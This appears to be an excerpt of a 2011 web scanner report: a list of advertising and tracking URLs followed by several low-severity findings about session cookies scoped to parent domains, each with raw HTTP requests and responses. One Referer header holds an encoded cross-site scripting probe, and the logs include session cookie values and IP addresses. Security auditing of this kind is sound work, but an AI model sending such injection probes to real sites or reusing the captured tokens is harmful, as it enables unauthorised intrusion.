http://pix04.revsci.net/I10985/b3/0/3/1008211/715243108.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/719321222.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/727551731.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/743305953.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/743306396.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/747675233.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/750853358.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/759659174.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/773834418.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/778726069.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/783069022.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/791107298.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/811937771.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/812722846.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/814191239.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/821864121.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/833474274.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/837302366.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/851863014.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/85990292.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/870883424.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/8734315.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/896562366.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/91490024.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/922092432.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/927091024.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/92794223.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/944603151.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/948985352.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/959799423.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/961894975.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/97296821.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/978202705.js
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
http://pixel.quantserve.com/seg/p-9eJ8k4iSzux46.js
http://pixel.rubiconproject.com/di.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://r.turn.com/r/beacon
http://r.turn.com/server/pixel.htm
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=16893018/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=22319790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=61218373/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=91953648/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=77103321/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://rover.ebay.com/ar/1/76417/4
http://rover.ebay.com/ar/1/76418/4
http://rp.gwallet.com/r1/ucm
http://rs.gwallet.com/r1/pixel/x113
http://rs.gwallet.com/r1/pixel/x9r8101111
http://rs.gwallet.com/r1/pixel/x9r8962146
http://rt.legolas-media.com/lgrt
http://sales.liveperson.net/hc/55601019/
http://sales.liveperson.net/hc/57386690/
http://segment-pixel.invitemedia.com/pixel
http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221
http://services.krxd.net/geoip
http://services.krxd.net/pixel.gif
http://sync.mathtag.com/sync
http://tacoda.at.atwola.com/rtx/r.gif
http://tags.bluekai.com/site/2831
http://tags.bluekai.com/site/2939
http://tags.bluekai.com/site/3561
http://tags.bluekai.com/site/38
http://tags.bluekai.com/site/3834
http://tags.bluekai.com/site/450
http://tap.rubiconproject.com/oz/feeds/targus/profile
http://tap.rubiconproject.com/oz/sensor
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js
http://va.px.invitemedia.com/pixel
http://va.px.invitemedia.com/set_partner_uid
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://www.bizographics.com/collect/
http://www.burstnet.com/enlightn/7644//AC95/
http://www.capitalone.com/creditcards/gateway/
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange_arrow.gif
http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay
http://www.wtp101.com/admeld_sync

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://cts-log.channelintelligence.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://cts-log.channelintelligence.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sessionstamp=73D45830-0435-B8E0-F460-B64B91036565;Domain=.channelintelligence.com;Expires=Thu, 16-Jun-11 13:32:18 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?vid=7580145&eid=13&tid=null&ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: cts-log.channelintelligence.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E&omni=3&selectedCatgry=SEARCH+ALL
Cookie: serverstamp=6E83F16D%2D7868%2D492A%2DACC1%2D953E4F625CFC

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:32:18 GMT
Server: Jetty(6.1.22)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: sessionstamp=73D45830-0435-B8E0-F460-B64B91036565;Domain=.channelintelligence.com;Expires=Thu, 16-Jun-11 13:32:18 GMT
P3p: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Content-Type: image/gif
Cache-Control: private,no-store
pragma: no-cache
Content-Length: 42
X-Powered-By: Mirror Image Internet
Via: 1.1 ric061003 (MII-APC/1.6)

GIF89a.............!.......,........@..D.;

10.2. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DotomiSession_2339=2_371600778172398468$330100732990473967$335422886$1308223767741; Domain=.dotomi.com; Path=/
DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Sat, 15-Jun-2013 11:29:27 GMT; Path=/
DotomiNet=2$DjQqblZ1RXhGA2JYBQV8XglHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLSkhaY2Reem1kVH9RLwVZaVwXXjkZDVJ%2BewJzA08IWWJWU0x0IyQsBAsRWgAbDwY%3D; Domain=.dotomi.com; Expires=Sat, 15-Jun-2013 11:29:27 GMT; Path=/
DotomiRR2339=-1$3$1$; Domain=.dotomi.com; Expires=Fri, 17-Jun-2011 11:29:27 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26Nu%3DP_PARENT_ID%26searchNav%3Dtrue&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_two=3bc35c3f-44ee-45ce-a5d3-315a00fe8438&dtmc_page_type=Subcategory& HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1308223637804902; DotomiUser=330100732990473967$0$335422886; DotomiSession_2339=2_371600778172398468$330100732990473967$335422886$1308223637825; DotomiNet=2$Dy0uMjgjDTEtBmZfAA97SVwROXYFdQFBDF9oVlZLYX5ja1xARQRCXAIPUkFOTkJZbGJeaD8rFxlHckENaVwAAnJZB1V5eAN%2BAUIdAycKX0h0IyQsBAsRWgAbDwY%3D; DotomiRR2339=-1$3$1$; rt_1982=2; le_9109=7

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:27 GMT
X-Name: dmc-o04
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Sat, 15-Jun-2013 11:29:27 GMT; Path=/
Set-Cookie: DotomiSession_2339=2_371600778172398468$330100732990473967$335422886$1308223767741; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$DjQqblZ1RXhGA2JYBQV8XglHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLSkhaY2Reem1kVH9RLwVZaVwXXjkZDVJ%2BewJzA08IWWJWU0x0IyQsBAsRWgAbDwY%3D; Domain=.dotomi.com; Expires=Sat, 15-Jun-2013 11:29:27 GMT; Path=/
Set-Cookie: DotomiRR2339=-1$3$1$; Domain=.dotomi.com; Expires=Fri, 17-Jun-2011 11:29:27 GMT; Path=/
Content-Type: text/html
Content-Length: 1571

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

10.3. http://pixel.everesttech.net/1688/i previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel.everesttech.net
Path:	/1688/i

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

everest_session_v2=4exN@kdiNH4AAIVh; path=/; domain=.everesttech.net
everest_g_v2=g_surferid~nqpN0lLRpx4AAMT1; path=/; domain=.everesttech.net; expires=Fri, 21-Jun-2030 04:51:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1688/i?ev_sid=58&ev_ci=700032768&ev_ai=700644175&ev_cri=705923885&ev_pl HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: everest_g_v2=g_surferid~nqpN0lLRpx4AAMT1

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:11:47 GMT
Server: Apache
Set-Cookie: everest_session_v2=4exN@kdiNH4AAIVh; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~nqpN0lLRpx4AAMT1; path=/; domain=.everesttech.net; expires=Fri, 21-Jun-2030 04:51:47 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Vary: X-EF-Forwarded-For,Cookie,Host
Last-Modified: Fri, 25 Mar 2011 18:11:07 GMT
ETag: "b60104-80-49f52848fe4c0"
Accept-Ranges: bytes
Content-Length: 128
Content-Type: image/png

.PNG
.
...IHDR.....................bKGD............. pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.

10.4. http://t.mookie1.com/t/v1/imp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session=1308233337|1308233338; path=/; domain=.mookie1.com
id=2814750682866683; path=/; expires=Tue, 10-Jul-12 14:08:58 GMT; domain=.mookie1.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q2_TF_GEN_728;RS_SELL_2011Q2_TF_GEN_728;:$:TribalFusionB3/RadioShack/SELL_2011Q2/728/L41:$:&migRandom=1958421561&migTrackFmtExt=network;account/campaign;ad;page HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 14:08:58 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=2814750682866683; path=/; expires=Tue, 10-Jul-12 14:08:58 GMT; domain=.mookie1.com
Set-Cookie: session=1308233337|1308233338; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

10.5. http://ttwbs.channelintelligence.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ttwbs.channelintelligence.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sessionstamp=9FD5284E-7FB9-9193-8558-F46CA7311DDA;Domain=.channelintelligence.com;Expires=Thu, 16-Jun-11 16:52:16 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?eid=43&vid=9919466&src=56654371&pid=56654371&cid=2110&cvid=2132&tid=9762D43ED61044A3971737D46337CDB0&afid=1304&plid=undefined&sku=&fcid=&ref=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN5823.RealMedia%2FB5598690.4%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fnetwork.realmedia.com%2FRealMedia%2Fads%2Fclick_lx.ads%2Ftrpnbcucnbc%2Fros%2F728x90%2Fjx%2Fss%2Fa%2FL30%2F1199171978%2FTop1%2FUSNetwork%2FBCN2011050712_001_HP%2FHP_728x90.html%2F726348573830336e374e674144526a62%3F&iid={IID} HTTP/1.1
Host: ttwbs.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/ba/%2a/e%3B242318863%3B0-0%3B0%3B65145569%3B3454-728/90%3B42541965/42559752/1%3B%3B%7Esscs%3D%3fhttp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=1199171978?&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145569&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: serverstamp=4B88CCEA%2D94CF%2DAEFC%2D64AD%2D028BB2019E0D

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: sessionstamp=9FD5284E-7FB9-9193-8558-F46CA7311DDA;Domain=.channelintelligence.com;Expires=Thu, 16-Jun-11 16:52:16 GMT
Cache-Control: private,no-store
Pragma: no-cache
X-Powered-By: Mirror Image Internet
P3p: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Thu, 16 Jun 2011 15:52:16 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.6. http://www.creditcards.com/xtrack.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.creditcards.com
Path:	/xtrack.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=1fd19d3bf56b479370ee4eb0292dea6e; path=/; domain=.creditcards.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xtrack.php? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:44:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308307493539892; path=/
Set-Cookie: PHPSESSID=1fd19d3bf56b479370ee4eb0292dea6e; path=/; domain=.creditcards.com
Set-Cookie: SSBAL=node.web2; path=/

10.7. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation previous next

Summary

